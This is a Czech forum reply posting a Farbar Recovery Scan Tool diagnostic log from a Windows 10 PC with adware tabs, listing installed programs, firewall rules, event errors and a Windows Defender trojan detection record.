Re: neustale vyskakuji zalozky s reklamou
Napsal: 12 zář 2020 11:00
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-09-2020
Ran by Milan (12-09-2020 11:54:24)
Running from C:\Users\Milan\Desktop
Windows 10 Home Version 1909 18363.1016 (X64) (2020-03-20 21:25:00)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1738925715-1269715944-3180472622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1738925715-1269715944-3180472622-503 - Limited - Disabled)
Guest (S-1-5-21-1738925715-1269715944-3180472622-501 - Limited - Disabled)
Milan (S-1-5-21-1738925715-1269715944-3180472622-1001 - Administrator - Enabled) => C:\Users\Milan
WDAGUtilityAccount (S-1-5-21-1738925715-1269715944-3180472622-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.433 - Adobe)
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 6.0.7 - philandro Software GmbH)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.6.3135 - AVG Technologies)
AVG Secure Browser (HKLM-x32\...\AVG Secure Browser) (Version: 85.0.5675.85 - Autoři prohlížeče AVG Secure Browser)
AVG Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1066.0 - AVG Technologies) Hidden
Car Mechanic Simulator 2018 Mercedes Benz (HKLM-x32\...\Car Mechanic Simulator 2018 Mercedes Benz_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 5.4.1.0928 - Disc Soft Ltd)
Dark Konflict (HKLM-x32\...\Dark Konflict) (Version: - )
Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform)
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version: - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
EpsonNet Print (HKLM\...\{96ED1D58-440C-4345-8FEE-C4781366C67F}) (Version: 3.1.4.0 - SEIKO EPSON Corporation)
Euro Truck Simulator 2 v1.35.3.4S (HKLM-x32\...\tuttop.com Euro Truck Simulator 2 v1.35.3.4S_is1) (Version: 1.35.3.4S - tuttop.com)
HELLGATE London (HKLM-x32\...\HELLGATE London_is1) (Version: - )
Java 8 Update 261 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.51 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{406C9ADB-1325-4FD0-9D13-C119CFF64E0A}) (Version: 2.65.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mockba to Berlin (HKLM-x32\...\{BCECC8FA-31AD-487A-A8C4-1C9C5454F9C6}_is1) (Version: 2.17 - US - ACTION, s.r.o.)
Mozilla Firefox 80.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 80.0.1 (x64 cs)) (Version: 80.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 69.0 - Mozilla)
NVIDIA Ovladače grafiky 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}) (Version: 9.10.0514 - NVIDIA Corporation)
Odinstalace tiskárny EPSON L3150 Series (HKLM\...\EPSON L3150 Series) (Version: - Seiko Epson Corporation)
Original War (HKLM-x32\...\Original War) (Version: - )
Příručky společnosti EPSON (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.56.1.0 - Seiko Epson Corporation)
S.T.A.L.K.E.R. Clear Sky (HKLM-x32\...\GOGPACKSTALKERSTCS_is1) (Version: 2.0.0.8 - GOG.com)
Siegecraft Commander (HKLM-x32\...\Siegecraft Commander_is1) (Version: - )
Skype verze 8.64 (HKLM-x32\...\Skype_is1) (Version: 8.64 - Skype Technologies S.A.)
Sniper Elite (HKLM-x32\...\{2527736B-927C-4E5F-A861-6BA616568B80}_is1) (Version: 1.0 - US - ACTION, s.r.o.)
Sorades - Die Befreiung (HKLM-x32\...\Sorades - Die Befreiung) (Version: 1.0 - diebefreiung.de)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Spintires Chernobyl (HKLM-x32\...\Spintires Chernobyl_is1) (Version: - )
Splitter 9.6.0.1 (HKLM-x32\...\WAV MP3 Splitter_is1) (Version: 9.6.0.1 - Piston Software)
Surviving Mars (HKLM-x32\...\Surviving Mars_is1) (Version: - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.5.0 - TeamSpeak Systems GmbH)
The Colonists (HKLM-x32\...\1282350952_is1) (Version: V1 - GOG.com)
The Sinking City (HKLM-x32\...\The Sinking City_is1) (Version: 0.0.0 - THE KNIGHT)
The Subject (HKLM-x32\...\The Subject_is1) (Version: - )
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Train Valley 2 Passenger Flow (HKLM-x32\...\Train Valley 2 Passenger Flow_is1) (Version: - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.11 - VideoLAN)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Packages:
=========
Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_6.12.4.0_x86__kgqvnymyfvs32 [2020-08-29] (king.com)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Studios) [MS Ad]
MSN Počasí -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.958.0_x64__56jybvy8sckqj [2020-08-29] (NVIDIA Corp.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveUltra] -> {F0E53CA3-02F8-40AE-9470-309F0309036F} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [DaemonShellExtImageUltra] -> {B5EBA666-2B94-4C7A-9CAA-A4539F329646} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\nvshext.dll [2019-10-04] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2020-03-21 10:40 - 2020-09-08 18:46 - 002072064 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 000310784 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 006903808 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2020-08-15 08:36 - 2020-08-15 08:36 - 003230720 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DotNetCommon\1ff547e9235b59188e9fe052625211ac\DotNetCommon.ni.dll
2018-11-29 14:21 - 2018-12-18 09:48 - 006142320 _____ (AVB Disc Soft, SIA -> Disc Soft Ltd) [File not signed] C:\Program Files\DAEMON Tools Ultra\engine.dll
2020-08-15 08:35 - 2020-08-15 08:35 - 004807680 _____ (Disc Soft Ltd) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DiscSoft.NET.Common\5eaf8b2270226ec230b3f2ddb6c2aeb0\DiscSoft.NET.Common.ni.dll
2016-09-14 14:31 - 2016-09-14 14:31 - 000500736 ____S (SEIKO EPSON CORPORATION) [File not signed] C:\WINDOWS\System32\enppmon.dll
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\localhost -> localhost
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 06:49 - 2020-09-11 20:05 - 000000841 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Milan\AppData\Roaming\Microsoft\Windows Photo Viewer\Tapeta programu Windows Prohlížeč fotografií.jpg
DNS Servers: 213.46.172.37 - 213.46.172.36
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{AF110A0F-4670-4C4D-BEE8-E19734C4583D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9C06B5BB-EDC4-4D95-B199-0729186F7C06}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{35FE486C-13A8-4115-91BE-EADD94521488}] => (Allow) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [{262D1130-0562-4ABD-9DBE-BD7A36B75E21}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D223F931-EC0B-418D-9CA1-86DED4F80FF0}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{9B85BCFD-5637-46EF-A544-F5CDD031E56D}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25501F14-C7E3-49B5-8AA0-F411A214A2BB}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{A3EBED2B-E21A-49AB-BEA3-6FB81621A465}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [UDP Query User{B51E31E2-FC04-4595-B7AB-A56857E725E5}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{FA9AB6ED-0A91-4065-8E02-AB57F96CA02A}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{F35B841D-2C85-46D4-9B66-2CC2D1A4A33D}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [TCP Query User{47D6DBFB-0BBF-4425-8906-78FA4190532B}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [UDP Query User{D5D966E3-E806-4944-8A51-2B58DF1551EE}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{0A47C543-177F-4283-B753-89601E79F3E0}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{6608746E-BB0D-4940-80AE-71255BADFC02}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E95688B6-E055-4354-9794-DC2A141C37A9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9C304D1E-B5CB-412A-AF72-2E84EE6DCDF1}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A50B23FA-CD55-4336-AD45-9DE5FF6B2823}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9D976B0F-3F56-4B50-9E8E-0DA017F266E9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D9B09C69-0FBB-4B86-A187-7F523BE921BD}] => (Allow) C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe (AVG Technologies USA, LLC -> AVG Technologies)
FirewallRules: [{B4A64F44-B7A6-4440-999A-5FFAAEF842CE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E81F9AC5-5422-4213-958F-C5671008BBC2}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E1DE6D90-F22C-4068-AAA3-43F04E202799}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{53461AB8-456B-4316-A4FF-8E6FE5C227AB}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{597C036D-4FC6-4760-B669-D78127F67E97}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{04A7F879-86AF-41FD-A67F-CD9805DD2D4F}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
==================== Restore Points =========================
28-08-2020 22:33:27 Naplánovaný kontrolní bod
29-08-2020 18:01:40 Operace obnovení
08-09-2020 17:10:36 Naplánovaný kontrolní bod
11-09-2020 20:03:34 zoek.exe restore point
11-09-2020 21:46:05 JRT Pre-Junkware Removal
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 8192 (0x0000000000002000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
System errors:
=============
Error: (09/12/2020 11:41:24 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 11:41:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:41:31 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:16:32 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:12:07 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:10:19 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 09:46:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba NVIDIA Display Container LS byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 6000 milisekund: Restartovat službu.
Error: (09/11/2020 09:45:18 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Windows Defender:
===================================
Date: 2020-08-29 22:36:38.516
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Wacatac.C!ml
ID: 2147749372
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe; file:_C:\Users\Milan\AppData\Local\Temp\acmiqlndjnf\zod1s2pvolq.exe; regkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y; runkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Windows\explorer.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
